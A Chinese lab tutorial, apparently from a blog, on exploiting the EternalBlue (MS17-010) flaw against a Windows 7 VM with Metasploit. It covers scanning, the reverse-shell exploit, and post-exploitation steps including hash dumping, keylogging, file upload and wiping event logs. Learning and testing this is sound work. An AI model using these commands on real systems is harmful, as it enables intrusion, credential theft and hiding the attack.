首页 > 其他分享 >Metaploit-永恒之蓝漏洞利用

Metaploit-永恒之蓝漏洞利用

时间:2024-12-19 14:56:46浏览次数:9  
标签:shell 攻击 meterpreter 010 漏洞 模块 永恒 Metaploit

1:Metaploit介绍  

本次测试主要是利用永恒之蓝漏洞对windows7进行控制利用,掌握Metaploit工具的使用,知道永恒之蓝的漏洞利用原理。永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

  进入metaploit命令:msfconsole,可以看出下面有总共有六个模块,辅助模块(auxiliary)、渗透攻击模块(exploits)、后渗透攻击模块(post)、攻击载荷模块(payloads)、空指令模块(nops)、编码器模块(encoders),其中msf为总模块,其他均为分支模块。


 实验环境

攻击机:192.168.202.132  (Kali安装Metaploit工具)

靶机:192.168.202.131 (windows7x64未打永恒之蓝补丁且关闭防火墙)


 实战漏洞利用

1.进入metaploit工具使用命令:msfconsole,可以看出下面有总共有六个模块,不同的模块功能使用的侧重点一样,在进行不同的探测之前使用不同的模块。

辅助模块(auxiliary)、渗透攻击模块(exploits)、后渗透攻击模块(post)、攻击载荷模块(payloads)、空指令模块(nops)、编码器模块(encoders),其中msf为总模块,其他均为分支模块。Metaploit的版本号为metasploit v4.17.3-dev

>>>msfconsole

2.在进行攻击利用之前,首先确实目标是否开放445端口,该漏洞Ms17-010是否存在,先做好简单的信息收集更能成功利用目标主机。

nmap探测主机信息

>>>nmap   -sV   192.168.202.131

====>>>445端口开放,目的主机为windows7系统,推测存在ms17-010漏洞

利用msf的auxiliary模块进行漏洞验证

>>>search ms17-010

搜索有关漏洞的模块,结果看到很多有关该漏洞的不同模块,可以使用auxiliary/scanner/smb/smb_ms17_010 进行验证

>>>use  auxiliary/scanner/smb/smb_ms17_010

>>>set  rhost  192.168.202.131

>>>set  rport   445

 

配置好之后,使用>>>run 探测一下查看结果存在该漏洞

3.验证存在漏洞之后,就可以利用永恒之蓝漏洞,使用其中的渗透攻击(exploit)模块,对其进行渗透攻击

a.设置攻击目标、端口、本机

>>>use  exploit/windows/smb/ms17_010_eternalblue

b.使用exp进行攻击时,要使用payload作为子弹进行攻击

>>>set  payload   windows/x64/meterpreter/reverse_tcp

c.查看具体配置是否完整

>>>show options 

d.进行攻击

>>>run

 

soga  进去了,看样子差不多可以嘿嘿嘿了*-*

4.进入shell,获取命令行,可以看到直接获得system权限 

meterpreter是metasploit框架中的一个扩展模块,作为溢出成功后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个meterpreter shell的链接。

a.从上面看出已经攻入成功,可以输入:sysinfo查看系统信息

meterpreter > sysinfo

 

b.反弹shell

meterpreter >shell

meterpreter shell作为渗透模块有很多有用的功能,比如:添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS(基于主机的入侵检测系统) 很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。

5.shell利用

(1).新建用户、获得用户密码

a.密码为进入hash加密值,可以利用在线解密进行破解

meterpreter > hashdump

可以看到用户名,密码,hash解码就可以拿到密码了

b.进入shell新建用户

c. 捕捉屏幕:screenhot

 

到这个路径下查看,可以看到返回的图片

 d.获取按键信息

开始获取:keyscan_start

下载内容:keyscan_dump

 

没有获取到,应该需要在捕获的同时需要进行键盘操作

e.上传文件

“upload”命令为上传文件到靶机下(例如黑客上传一个勒索病毒WannaCry),测试上传了一个hack.exe文件到,可以直接执行

f. 清除事件日志

执行“clearev”命令,将清除事件日志。

标签:shell,攻击,meterpreter,010,漏洞,模块,永恒,Metaploit
From: https://blog.csdn.net/2401_88756905/article/details/144569879

相关文章

  • 常见漏洞—SSRF_FastCGI
    FastCGI协议简介FastCGI源自旧版本的CGI路由/结构图#访问url-->浏览器生成HTTP请求报文-->webserver解析请求(例如nginx)webserver是内容的分发者当访问静态页面时,webserver会直接返回资源,例如index.html当访问动态页面时,webserver会调用解析器,例如index......
  • 常见漏洞—SQL注入
    前段时间刷了技能树,趁热打铁,把学到的知识点总结一下1.SQL注入类别1-1.按照有无回显可以把SQL注入分为有回显的SQL注入盲注1-2.按照SQL注入方法可以分为Union注入布尔注入时延注入报错注入1-3.按照注入位置可以分为GET参数注入POST参数注入HTTP请求头注入2.攻击思路寻......
  • 13-MSF常见漏洞复现
    1、MS08-067、MS10-018漏洞复现,对比bind和reverse攻击模式的区别MS08-067环境:使用kali中的MSF工具攻击WindowsXP开启msfconsole,搜索MS08-067漏洞,进入漏洞利用模块msfconsolesearchms08-067useexploit/windows/smb/ms08_067_netapi查看配置项showoptions设......
  • 【AI安全漏洞】VLLM反序列化漏洞分析与保姆级复现(附批量利用)
    #CVE-2024-9052环境需要Linux(这里使用kali)、Anaconda首先安装Anaconda前言最好使用linux,如果使用windows可能会产生各种报错(各种各种各种!!!),最好使用Anaconda,方便独立管理虚拟机使用conda创建虚拟机、python要求3.10condacreate-nvllm_beampython=3.10-y启动该虚拟机......
  • #渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍04-盲SQL注入(Blind SQL Injection)
    免责声明本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章阅读。目录一、盲SQL注入(BlindSQLInjection)的概念二、盲SQL注......
  • 会话管理漏洞--会话劫持,会话固定
     会话资源划分--公有资源,私有资源(需要某种验证才可以访问的资源)http协议--无状态,无连接无状态--指的是服务器不保留于客户端交互时的任何状态,每次请求之前都是独立的,目的是减轻服务器的记忆负担无连接--指的是只有当客户端发送请求时才建立连接,当请求完毕的时候直接释放这......
  • metinfo-csrf漏洞复现攻略
    CSRF漏洞概念:由于⽹站对⽤户⽹⻚浏览器的信任导致⽤户在当前已登录的Web站点的状态下,访问攻击者构造的攻击连接从⽽执⾏⾮本意的操作的漏洞CSRF漏洞利⽤条件:1.⽤户处于登陆⽬标⽹站的状态(Cookie)2.⽤户点击攻击者发送的恶意URL连接下面是详细的流程:将所需要的metinfo文......
  • MetInfo中CSRF漏洞复现
    一、访问我们的靶场后台进行登录这里我们同时用Edge和火狐浏览器火狐浏览器用来做攻击方,Edge扮演受害者二、利用火狐浏览器抓包构造html链接攻击1.在火狐浏览器中新建管理员输入数据并抓包2.利用抓包请求制作链接制作du.html三、将攻击链接发给受害者四、当受害......
  • 汉塔上网行为管理系统 ping.php存在命令注入漏洞
    免责声明:本文旨在提供有关特定漏洞的深入信息,帮助用户充分了解潜在的安全风险。发布此信息的目的在于提升网络安全意识和推动技术进步,未经授权访问系统、网络或应用程序,可能会导致法律责任或严重后果。因此,作者不对读者基于本文内容所采取的任何行为承担责任。读者在使用本......
  • Spring Framework存在目录遍历漏洞(CVE-2024-38819)
    免责声明:本文旨在提供有关特定漏洞的深入信息,帮助用户充分了解潜在的安全风险。发布此信息的目的在于提升网络安全意识和推动技术进步,未经授权访问系统、网络或应用程序,可能会导致法律责任或严重后果。因此,作者不对读者基于本文内容所采取的任何行为承担责任。读者在使用本......